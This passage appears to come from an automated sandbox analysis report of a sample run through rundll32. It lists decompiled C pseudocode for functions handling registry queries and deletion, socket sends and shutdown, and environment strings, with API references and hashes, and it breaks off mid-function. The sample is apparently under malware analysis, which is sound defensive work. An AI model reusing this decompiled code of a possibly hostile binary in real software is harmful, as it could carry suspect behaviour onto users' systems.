                                                            • SHDeleteKeyW.SHLWAPI(?,0467C5D0), ref: 04641284
                                                            • RegCloseKey.ADVAPI32(?), ref: 04641292
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 046412B0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpen
                                                            • String ID:
                                                            • API String ID: 3791902735-0
                                                            • Opcode ID: 69534b692a9a8caa521a4eba161ad0fcc394766e3f75c15aa950536f04354d68
                                                            • Instruction ID: b210272c4c066c4c9f28322db703f7b1602286cef05315a7c5e14284efdb47a0
                                                            • Opcode Fuzzy Hash: 69534b692a9a8caa521a4eba161ad0fcc394766e3f75c15aa950536f04354d68
                                                            • Instruction Fuzzy Hash: 97314FB5900218EBDF14DFA4DC48AEE7BB8EF45714F14812AF90AE7241F775AA50CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0464F770(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                            				intOrPtr _t31;
                                                            				intOrPtr* _t43;
                                                            				intOrPtr _t45;
                                                            				intOrPtr _t48;
                                                            				intOrPtr _t49;
                                                            				intOrPtr _t50;
                                                            				struct _CRITICAL_SECTION* _t51;
                                                            				intOrPtr _t52;
                                                            
                                                            				_t50 = _a4;
                                                            				_t43 = __ecx;
                                                            				if( *((intOrPtr*)(_t50 + 0x18)) ==  *((intOrPtr*)(_t50 + 0x14))) {
                                                            					L5:
                                                            					return 1;
                                                            				} else {
                                                            					do {
                                                            						_t49 =  *((intOrPtr*)(_t50 + 0x14));
                                                            						_t45 =  *((intOrPtr*)(_t43 + 0x2c));
                                                            						_t31 =  *((intOrPtr*)(_t50 + 0x18)) - _t49;
                                                            						_t46 =  <  ? _t31 : _t45;
                                                            						__imp__#19( *((intOrPtr*)(_t43 + 0x1c)), _t49,  <  ? _t31 : _t45, 0);
                                                            						_a4 = _t31;
                                                            						if(_t31 <= 0) {
                                                            							if(_t31 == 0xffffffff) {
                                                            								__imp__#111();
                                                            								if(_t31 != 0x2733) {
                                                            									 *((intOrPtr*)(_t43 + 0x14)) = _t31;
                                                            									 *((intOrPtr*)(_t43 + 0xc)) = 1;
                                                            									 *((intOrPtr*)(_t43 + 0x10)) = 3;
                                                            									 *((intOrPtr*)(_t43 + 0x18)) = 1;
                                                            									return 0;
                                                            								} else {
                                                            									 *_a8 = 1;
                                                            									return 1;
                                                            								}
                                                            							} else {
                                                            								goto L4;
                                                            							}
                                                            						} else {
                                                            							_t51 = _t43 + 0x14c;
                                                            							EnterCriticalSection(_t51);
                                                            							 *((intOrPtr*)(_t43 + 0x180)) =  *((intOrPtr*)(_t43 + 0x180)) - _a4;
                                                            							LeaveCriticalSection(_t51);
                                                            							SetLastError(0);
                                                            							_t52 = _a4;
                                                            							 *((intOrPtr*)( *_t43 + 0x84))( *((intOrPtr*)(_t50 + 0x14)), _t52);
                                                            							_t48 =  *((intOrPtr*)(_t50 + 0x14));
                                                            							_t53 =  <  ?  *((intOrPtr*)(_t50 + 0x18)) - _t48 : _t52;
                                                            							 *((intOrPtr*)(_t50 + 0x14)) = _t48 + ( <  ?  *((intOrPtr*)(_t50 + 0x18)) - _t48 : _t52);
                                                            							goto L4;
                                                            						}
                                                            						goto L9;
                                                            						L4:
                                                            					} while ( *((intOrPtr*)(_t50 + 0x18)) !=  *((intOrPtr*)(_t50 + 0x14)));
                                                            					goto L5;
                                                            				}
                                                            				L9:
                                                            			}











                                                            0x0464f776
                                                            0x0464f779
                                                            0x0464f781
                                                            0x0464f801
                                                            0x0464f808
                                                            0x0464f783
                                                            0x0464f783
                                                            0x0464f783
                                                            0x0464f789
                                                            0x0464f78c
                                                            0x0464f792
                                                            0x0464f79a
                                                            0x0464f7a0
                                                            0x0464f7a5
                                                            0x0464f7f5
                                                            0x0464f80b
                                                            0x0464f816
                                                            0x0464f82e
                                                            0x0464f834
                                                            0x0464f83b
                                                            0x0464f842
                                                            0x0464f84b
                                                            0x0464f818
                                                            0x0464f81e
                                                            0x0464f82a
                                                            0x0464f82a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f7a7
                                                            0x0464f7a7
                                                            0x0464f7ae
                                                            0x0464f7b7
                                                            0x0464f7be
                                                            0x0464f7c6
                                                            0x0464f7cc
                                                            0x0464f7d7
                                                            0x0464f7dd
                                                            0x0464f7e7
                                                            0x0464f7ed
                                                            0x00000000
                                                            0x0464f7ed
                                                            0x00000000
                                                            0x0464f7f7
                                                            0x0464f7fa
                                                            0x00000000
                                                            0x0464f783
                                                            0x00000000

                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000), ref: 0464F79A
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464F7AE
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464F7BE
                                                            • SetLastError.KERNEL32(00000000,?,?,0464F6B6,?,00000000), ref: 0464F7C6
                                                            • WSAGetLastError.WS2_32(?,?,0464F6B6,?,00000000), ref: 0464F80B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeavesend
                                                            • String ID:
                                                            • API String ID: 421069059-0
                                                            • Opcode ID: fde1bb43af05b46fed64f53366cd6e8ef867d437baf9fe2a45569f7d5da14863
                                                            • Instruction ID: 83f5c12f7c3d1b17a21006220b31ead00e43989512ff1ce74d78780c86e5aa53
                                                            • Opcode Fuzzy Hash: fde1bb43af05b46fed64f53366cd6e8ef867d437baf9fe2a45569f7d5da14863
                                                            • Instruction Fuzzy Hash: 5C217136200505AFDB04CF6DE888A99BBB9FF58320F104266F809CB240E775F991CBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 97%
                                                            			E04640C60(void* __ecx, short* __edx, char* _a8) {
                                                            				int _v8;
                                                            				void* _v12;
                                                            				int _v16;
                                                            				void* __esi;
                                                            				char* _t19;
                                                            				char* _t22;
                                                            				long _t26;
                                                            				char* _t28;
                                                            				char* _t33;
                                                            
                                                            				_t32 = __ecx;
                                                            				if(RegOpenKeyExW(__ecx, __edx, 0, 0x20119,  &_v12) == 0) {
                                                            					_v8 = 0;
                                                            					_t36 = 0;
                                                            					_t19 = RegQueryValueExW(_v12, "1", 0,  &_v16, 0,  &_v8);
                                                            					__eflags = _t19;
                                                            					if(_t19 != 0) {
                                                            						L11:
                                                            						RegCloseKey(_v12);
                                                            						return _t36;
                                                            					} else {
                                                            						_t22 = _v8;
                                                            						__eflags = _t22;
                                                            						if(__eflags == 0) {
                                                            							goto L11;
                                                            						} else {
                                                            							_push(_t22);
                                                            							_t36 = L04655B55(_t32, 0, __eflags);
                                                            							__eflags = _t36;
                                                            							if(_t36 == 0) {
                                                            								goto L11;
                                                            							} else {
                                                            								_t26 = RegQueryValueExW(_v12, "1", 0,  &_v16, _t36,  &_v8);
                                                            								__eflags = _t26;
                                                            								if(_t26 != 0) {
                                                            									L10:
                                                            									L04655B0F(_t36);
                                                            									_t36 = 0;
                                                            									__eflags = 0;
                                                            									goto L11;
                                                            								} else {
                                                            									_t28 = _v8;
                                                            									__eflags = _t28;
                                                            									if(_t28 == 0) {
                                                            										goto L10;
                                                            									} else {
                                                            										__eflags = _v16 - 3;
                                                            										if(_v16 != 3) {
                                                            											goto L10;
                                                            										} else {
                                                            											_t33 = _a8;
                                                            											__eflags = _t33;
                                                            											if(_t33 == 0) {
                                                            												goto L11;
                                                            											} else {
                                                            												 *_t33 = _t28;
                                                            												RegCloseKey(_v12);
                                                            												return _t36;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}












                                                            0x04640c60
                                                            0x04640c7b
                                                            0x04640c87
                                                            0x04640c8f
                                                            0x04640c9f
                                                            0x04640ca5
                                                            0x04640ca7
                                                            0x04640d0d
                                                            0x04640d10
                                                            0x04640d1c
                                                            0x04640ca9
                                                            0x04640ca9
                                                            0x04640cac
                                                            0x04640cae
                                                            0x00000000
                                                            0x04640cb0
                                                            0x04640cb0
                                                            0x04640cb6
                                                            0x04640cbb
                                                            0x04640cbd
                                                            0x00000000
                                                            0x04640cbf
                                                            0x04640cd2
                                                            0x04640cd8
                                                            0x04640cda
                                                            0x04640d02
                                                            0x04640d03
                                                            0x04640d0b
                                                            0x04640d0b
                                                            0x00000000
                                                            0x04640cdc
                                                            0x04640cdc
                                                            0x04640cdf
                                                            0x04640ce1
                                                            0x00000000
                                                            0x04640ce3
                                                            0x04640ce3
                                                            0x04640ce7
                                                            0x00000000
                                                            0x04640ce9
                                                            0x04640ce9
                                                            0x04640cec
                                                            0x04640cee
                                                            0x00000000
                                                            0x04640cf0
                                                            0x04640cf3
                                                            0x04640cf5
                                                            0x04640d01
                                                            0x04640d01
                                                            0x04640cee
                                                            0x04640ce7
                                                            0x04640ce1
                                                            0x04640cda
                                                            0x04640cbd
                                                            0x04640cae
                                                            0x04640c7d
                                                            0x04640c82
                                                            0x04640c82

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,0464966F,?,?), ref: 04640C73
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,?,?), ref: 04640C9F
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,00000000), ref: 04640CD2
                                                            • RegCloseKey.ADVAPI32(?), ref: 04640CF5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID:
                                                            • API String ID: 1586453840-0
                                                            • Opcode ID: f1f32f9f2c48e639f86438998497a3f1984690cf3d6b82ffb685697306275fc0
                                                            • Instruction ID: 9d8bcb694cac23e15fc17abec35c27698902f370989fae6435f12770f7966c19
                                                            • Opcode Fuzzy Hash: f1f32f9f2c48e639f86438998497a3f1984690cf3d6b82ffb685697306275fc0
                                                            • Instruction Fuzzy Hash: 8D215471A05128BBDF209EA0AC09BAEBB7CEF41615F0441A6ED09E2201F731BA14CA91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E04655A30(void* __ebx, HANDLE* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				struct tagMSG _v36;
                                                            				signed int _v40;
                                                            				HANDLE* _v44;
                                                            				signed int _t15;
                                                            				signed int _t16;
                                                            				signed int _t17;
                                                            				int _t18;
                                                            				int _t21;
                                                            				void* _t30;
                                                            				long _t34;
                                                            				void* _t40;
                                                            				void* _t43;
                                                            				signed int _t46;
                                                            
                                                            				_t43 = __esi;
                                                            				_t40 = __edi;
                                                            				_t30 = __ebx;
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_t16 = _t15 ^ _t46;
                                                            				_v8 = _t16;
                                                            				_t33 = timeGetTime;
                                                            				_v44 = __edx;
                                                            				if(_a4 != 0xffffffff) {
                                                            					_t17 = timeGetTime();
                                                            					_t33 = timeGetTime;
                                                            				} else {
                                                            					_t17 = _t16 | 0xffffffff;
                                                            				}
                                                            				_push(_t30);
                                                            				_push(_t43);
                                                            				_push(_t40);
                                                            				_v40 = _t17;
                                                            				L4:
                                                            				while(1) {
                                                            					do {
                                                            						if(_t17 == 0xffffffff) {
                                                            							_t34 = _t33 | 0xffffffff;
                                                            							goto L9;
                                                            						} else {
                                                            							_t34 = _v40 -  *_t33() + _a4;
                                                            							if(_t34 > 0) {
                                                            								L9:
                                                            								_t18 = MsgWaitForMultipleObjects(1, _v44, 0, _t34, 0x4ff);
                                                            								if(_t18 == 1) {
                                                            									goto L10;
                                                            								}
                                                            							} else {
                                                            							}
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t46);
                                                            						L10:
                                                            						_t21 = PeekMessageW( &_v36, 0, 0, 0, _t18);
                                                            						_t33 = timeGetTime;
                                                            						_t17 = _v40;
                                                            					} while (_t21 == 0);
                                                            					do {
                                                            						TranslateMessage( &_v36);
                                                            						DispatchMessageW( &_v36);
                                                            					} while (PeekMessageW( &_v36, 0, 0, 0, 1) != 0);
                                                            					_t17 = _v40;
                                                            					_t33 = timeGetTime;
                                                            				}
                                                            			}

















                                                            0x04655a30
                                                            0x04655a30
                                                            0x04655a30
                                                            0x04655a36
                                                            0x04655a3b
                                                            0x04655a3d
                                                            0x04655a44
                                                            0x04655a4a
                                                            0x04655a4d
                                                            0x04655a54
                                                            0x04655a56
                                                            0x04655a4f
                                                            0x04655a4f
                                                            0x04655a4f
                                                            0x04655a5c
                                                            0x04655a63
                                                            0x04655a6a
                                                            0x04655a71
                                                            0x00000000
                                                            0x04655a74
                                                            0x04655a74
                                                            0x04655a77
                                                            0x04655a9d
                                                            0x00000000
                                                            0x04655a79
                                                            0x04655a80
                                                            0x04655a85
                                                            0x04655aa0
                                                            0x04655aad
                                                            0x04655ab6
                                                            0x00000000
                                                            0x00000000
                                                            0x04655a87
                                                            0x04655a87
                                                            0x04655a85
                                                            0x04655a9c
                                                            0x04655ab8
                                                            0x04655ac3
                                                            0x04655ac5
                                                            0x04655acd
                                                            0x04655acd
                                                            0x04655ad2
                                                            0x04655ad6
                                                            0x04655adc
                                                            0x04655aec
                                                            0x04655af0
                                                            0x04655af3
                                                            0x04655af3

                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,73D244A0,000004FF), ref: 04655AAD
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04655AC3
                                                            • TranslateMessage.USER32(?), ref: 04655AD6
                                                            • DispatchMessageW.USER32(?), ref: 04655ADC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04655AEA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                            • String ID:
                                                            • API String ID: 2015114452-0
                                                            • Opcode ID: 423902568f5bdda9970b1ff767deecd5af83a0bf8a0241c9f2fcd97749a0fb7e
                                                            • Instruction ID: b3f0bfa844cab245527586d89edac1c35109b37687053b8d9f7510bc7f8d5528
                                                            • Opcode Fuzzy Hash: 423902568f5bdda9970b1ff767deecd5af83a0bf8a0241c9f2fcd97749a0fb7e
                                                            • Instruction Fuzzy Hash: 4C218831641208ABDB18DEA4DC89FED77B8EB48710F101219E912E72D4FA74BC018B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E0466A67B() {
                                                            				int _v8;
                                                            				void* __ecx;
                                                            				void* _t6;
                                                            				int _t7;
                                                            				char* _t13;
                                                            				int _t17;
                                                            				void* _t19;
                                                            				char* _t25;
                                                            				WCHAR* _t27;
                                                            
                                                            				_t27 = GetEnvironmentStringsW();
                                                            				if(_t27 == 0) {
                                                            					L7:
                                                            					_t13 = 0;
                                                            				} else {
                                                            					_t6 = E0466A644(_t27);
                                                            					_pop(_t19);
                                                            					_t17 = _t6 - _t27 >> 1;
                                                            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                            					_v8 = _t7;
                                                            					if(_t7 == 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						_t25 = E046684E7(_t19, _t7);
                                                            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                            							_t13 = 0;
                                                            						} else {
                                                            							_t13 = _t25;
                                                            							_t25 = 0;
                                                            						}
                                                            						E046684AD(_t25);
                                                            					}
                                                            				}
                                                            				if(_t27 != 0) {
                                                            					FreeEnvironmentStringsW(_t27);
                                                            				}
                                                            				return _t13;
                                                            			}












                                                            0x0466a68a
                                                            0x0466a690
                                                            0x0466a6e8
                                                            0x0466a6e8
                                                            0x0466a692
                                                            0x0466a693
                                                            0x0466a698
                                                            0x0466a6a1
                                                            0x0466a6a7
                                                            0x0466a6ad
                                                            0x0466a6b2
                                                            0x00000000
                                                            0x0466a6b4
                                                            0x0466a6ba
                                                            0x0466a6bf
                                                            0x0466a6dd
                                                            0x0466a6d7
                                                            0x0466a6d7
                                                            0x0466a6d9
                                                            0x0466a6d9
                                                            0x0466a6e0
                                                            0x0466a6e5
                                                            0x0466a6b2
                                                            0x0466a6ec
                                                            0x0466a6ef
                                                            0x0466a6ef
                                                            0x0466a6fd

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0466A684
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0466A6A7
                                                              • Part of subcall function 046684E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04668519
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0466A6CD
                                                            • _free.LIBCMT ref: 0466A6E0
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0466A6EF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 95416ebfdb51718baa28f5fd2180e5e03b8791aafa8fc511d80e467f151cce81
                                                            • Instruction ID: c0807c56dc9c2a8a1baeed3f29d2bdbd191ec58a72ef26d95652b6932f53d9c8
                                                            • Opcode Fuzzy Hash: 95416ebfdb51718baa28f5fd2180e5e03b8791aafa8fc511d80e467f151cce81
                                                            • Instruction Fuzzy Hash: 5D01DF727062957F63212AF65C8CC7B6A6DDED3AA5319012DBD16E7200FEA4AC02D1B4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 22%
                                                            			E0464F850(intOrPtr* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				intOrPtr _t24;
                                                            				intOrPtr _t25;
                                                            				long _t31;
                                                            				intOrPtr* _t39;
                                                            
                                                            				_t39 = __ecx;
                                                            				_t31 = GetCurrentThreadId();
                                                            				if( *((intOrPtr*)(_t39 + 0x50)) == 3) {
                                                            					L10:
                                                            					 *((intOrPtr*)(_t39 + 0x48)) = 1;
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(_t39 + 0x148);
                                                            					if( *((intOrPtr*)( *_t39 + 0x24))() == 0) {
                                                            						 *((intOrPtr*)(_t39 + 0x148)) = 0;
                                                            						goto L10;
                                                            					} else {
                                                            						 *((intOrPtr*)(_t39 + 0x50)) = 2;
                                                            						_push(_t31);
                                                            						 *((intOrPtr*)(_t39 + 0x148)) = 0;
                                                            						E0464E8C0(_t31, _t39, _t39);
                                                            						 *((intOrPtr*)(_t39 + 0x4c)) = 0;
                                                            						if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                                                            							 *((intOrPtr*)( *_t39 + 0x90))( *((intOrPtr*)(_t39 + 0x10)),  *((intOrPtr*)(_t39 + 0x14)));
                                                            						}
                                                            						_t24 =  *((intOrPtr*)(_t39 + 0x20));
                                                            						if(_t24 != 0) {
                                                            							__imp__WSACloseEvent(_t24);
                                                            							 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                            						}
                                                            						_t25 =  *((intOrPtr*)(_t39 + 0x1c));
                                                            						if(_t25 != 0xffffffff) {
                                                            							__imp__#22(_t25, 1);
                                                            							__imp__#3( *((intOrPtr*)(_t39 + 0x1c)));
                                                            							 *((intOrPtr*)(_t39 + 0x1c)) = 0xffffffff;
                                                            						}
                                                            						 *((intOrPtr*)( *_t39 + 0xb8))();
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}









                                                            0x0464f853
                                                            0x0464f85f
                                                            0x0464f861
                                                            0x0464f906
                                                            0x0464f90b
                                                            0x0464f912
                                                            0x0464f91d
                                                            0x0464f867
                                                            0x0464f86d
                                                            0x0464f87b
                                                            0x0464f8fc
                                                            0x00000000
                                                            0x0464f87d
                                                            0x0464f87d
                                                            0x0464f886
                                                            0x0464f887
                                                            0x0464f891
                                                            0x0464f89a
                                                            0x0464f8a1
                                                            0x0464f8ad
                                                            0x0464f8ad
                                                            0x0464f8b3
                                                            0x0464f8b8
                                                            0x0464f8bb
                                                            0x0464f8c1
                                                            0x0464f8c1
                                                            0x0464f8c8
                                                            0x0464f8ce
                                                            0x0464f8d3
                                                            0x0464f8dc
                                                            0x0464f8e2
                                                            0x0464f8e2
                                                            0x0464f8ed
                                                            0x0464f8fb
                                                            0x0464f8fb
                                                            0x0464f87b

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464F855
                                                            • SetLastError.KERNEL32(0000139F,?,00000000,04638135,74D0F5E0,00000000,80004005,80004005,80004005,80004005,80004005,?,04638B27,0467E048,?), ref: 0464F912
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                              • Part of subcall function 0464E8C0: SetEvent.KERNEL32(?,?,04638B6E,0467E024,?), ref: 0464E8E7
                                                              • Part of subcall function 0464E8C0: CloseHandle.KERNEL32(00000000,?,04638B6E,0467E024,?), ref: 0464E90A
                                                            • WSACloseEvent.WS2_32(00000000), ref: 0464F8BB
                                                            • shutdown.WS2_32(?,00000001), ref: 0464F8D3
                                                            • closesocket.WS2_32(?), ref: 0464F8DC
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketshutdown
                                                            • String ID:
                                                            • API String ID: 880953794-0
                                                            • Opcode ID: 1d050aa5bf3dd18b7765c987f566bdbb8acba4cf1962ed33e1f81a0a5db1ae14
                                                            • Instruction ID: 7390c6ca60d1fc6a663574ea82937559109a611e5b7b8767cab47da4614bc38d
                                                            • Opcode Fuzzy Hash: 1d050aa5bf3dd18b7765c987f566bdbb8acba4cf1962ed33e1f81a0a5db1ae14
                                                            • Instruction Fuzzy Hash: 43210A70300602AFDB189F65D48CB99BBB6FF84325F144228E019866D0DBB5F865CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E046689B4(void* __ecx) {
                                                            				void* __esi;
                                                            				intOrPtr _t2;
                                                            				void* _t4;
                                                            				void* _t10;
                                                            				void* _t11;
                                                            				void* _t13;
                                                            				void* _t15;
                                                            				long _t16;
                                                            
                                                            				_t11 = __ecx;
                                                            				_t16 = GetLastError();
                                                            				_t10 = 0;
                                                            				_t2 =  *0x468403c; // 0x8
                                                            				_t19 = _t2 - 0xffffffff;
                                                            				if(_t2 == 0xffffffff) {
                                                            					L2:
                                                            					_t15 = E04668535(_t11, 1, 0x364);
                                                            					_pop(_t13);
                                                            					if(_t15 != 0) {
                                                            						_t4 = E04669171(_t13, _t16, __eflags,  *0x468403c, _t15);
                                                            						__eflags = _t4;
                                                            						if(_t4 != 0) {
                                                            							E04668776(_t13, _t15, 0x468742c);
                                                            							E046684AD(_t10);
                                                            							__eflags = _t15;
                                                            							if(_t15 != 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								goto L8;
                                                            							}
                                                            						} else {
                                                            							_push(_t15);
                                                            							goto L4;
                                                            						}
                                                            					} else {
                                                            						_push(_t10);
                                                            						L4:
                                                            						E046684AD();
                                                            						L8:
                                                            						SetLastError(_t16);
                                                            					}
                                                            				} else {
                                                            					_t15 = E0466911B(_t11, _t16, _t19, _t2);
                                                            					if(_t15 != 0) {
                                                            						L9:
                                                            						SetLastError(_t16);
                                                            						_t10 = _t15;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            				return _t10;
                                                            			}











                                                            0x046689b4
                                                            0x046689bf
                                                            0x046689c1
                                                            0x046689c3
                                                            0x046689c8
                                                            0x046689cb
                                                            0x046689d9
                                                            0x046689e5
                                                            0x046689e8
                                                            0x046689eb
                                                            0x046689fd
                                                            0x04668a02
                                                            0x04668a04
                                                            0x04668a0f
                                                            0x04668a15
                                                            0x04668a1d
                                                            0x04668a1f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04668a06
                                                            0x04668a06
                                                            0x00000000
                                                            0x04668a06
                                                            0x046689ed
                                                            0x046689ed
                                                            0x046689ee
                                                            0x046689ee
                                                            0x04668a21
                                                            0x04668a22
                                                            0x04668a22
                                                            0x046689cd
                                                            0x046689d3
                                                            0x046689d7
                                                            0x04668a2a
                                                            0x04668a2b
                                                            0x04668a31
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046689d7
                                                            0x04668a38

                                                            APIs
                                                            • GetLastError.KERNEL32(00000001,D355BE4E,-00000004,04661777,046684D3,D355BE4E,?,046612C5,00000001,00000001), ref: 046689B9
                                                            • _free.LIBCMT ref: 046689EE
                                                            • _free.LIBCMT ref: 04668A15
                                                            • SetLastError.KERNEL32(00000000,00000001), ref: 04668A22
                                                            • SetLastError.KERNEL32(00000000,00000001), ref: 04668A2B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 0a4c0ca73baec9cead92e48b4b45c18578c70b5d8bb4b99f814929a9b2ebb97e
                                                            • Instruction ID: f4bf2dc5ddee5518f39c246d4d087f64cda927eade205d0b2798635a735e28c0
                                                            • Opcode Fuzzy Hash: 0a4c0ca73baec9cead92e48b4b45c18578c70b5d8bb4b99f814929a9b2ebb97e
                                                            • Instruction Fuzzy Hash: FF01F936206601A793227A756C88D2B166EDFD52B9324412DFC07E3241FF39BC024565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046518D0(signed int __ecx, signed int* _a4) {
                                                            				signed int _t18;
                                                            				signed int _t20;
                                                            				signed int _t23;
                                                            				signed int _t26;
                                                            				struct _CRITICAL_SECTION* _t30;
                                                            
                                                            				_t18 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x1f4)) != 0) {
                                                            					_t30 = __ecx + 0x1f8;
                                                            					EnterCriticalSection(_t30);
                                                            					if( *((intOrPtr*)(_t18 + 0x1f4)) != 0) {
                                                            						_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x210)) + 0x68)) +  *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x210)) + 0x60));
                                                            						LeaveCriticalSection(_t30);
                                                            						 *_a4 = _t20;
                                                            						return  !_t20 >> 0x1f;
                                                            					} else {
                                                            						SetLastError(0x139f);
                                                            						LeaveCriticalSection(_t30);
                                                            						_t23 = _t18 | 0xffffffff;
                                                            						 *_a4 = _t23;
                                                            						return  !_t23 >> 0x1f;
                                                            					}
                                                            				} else {
                                                            					SetLastError(0x139f);
                                                            					_t26 = _t18 | 0xffffffff;
                                                            					 *_a4 = _t26;
                                                            					return  !_t26 >> 0x1f;
                                                            				}
                                                            			}








                                                            0x046518d4
                                                            0x046518dd
                                                            0x046518ff
                                                            0x04651906
                                                            0x04651913
